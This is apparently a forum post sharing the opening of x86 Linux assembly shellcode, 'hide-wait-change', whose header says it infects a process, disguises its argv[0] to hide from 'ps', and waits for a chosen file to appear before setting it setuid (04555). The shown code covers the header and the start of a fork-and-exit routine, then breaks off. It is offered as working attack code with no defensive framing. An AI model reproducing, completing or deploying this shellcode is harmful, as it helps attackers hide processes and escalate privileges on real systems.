Partizan
New member
Kod:
#=============================================================================================#
# hide-wait-change (final v3) #
# ------------------------------------------------------------------------------------------- #
# Author: xort ([email protected]) #
# Date: 08/18/2005 8:05pm #
# Type: shellcode/(x86-linux).s, (at&t) #
# Size: strlen(fake-proc-name) + strlen(file-to-change) + 187 #
# Discription: This is a shellcode that will infect a process, play some argv[0] games among #
# other tricks to hide itself from 'ps', and waits until the creation of a #
# specified file. Once this file is found to exist, its permissions are changed #
# to 04555. Original concept concived by izik ([email protected]). #
###############################################################################################
.section .text
.global _start
###################################################################################
## ##
## _start: 1) fork() a new process ##
## 2) check to see if we are child process ##
## 3) if we are then _exit() ##
## ##
###################################################################################
_start:
#-------------------------------------------#
# we start with a fork() #
#-------------------------------------------#
push $0x02
pop %eax
int $0x80
#-------------------------------------------#
# child or parent? #
#-------------------------------------------#
test %eax, %eax
je proc_name
#-------------------------------------------#
# parent goes exit()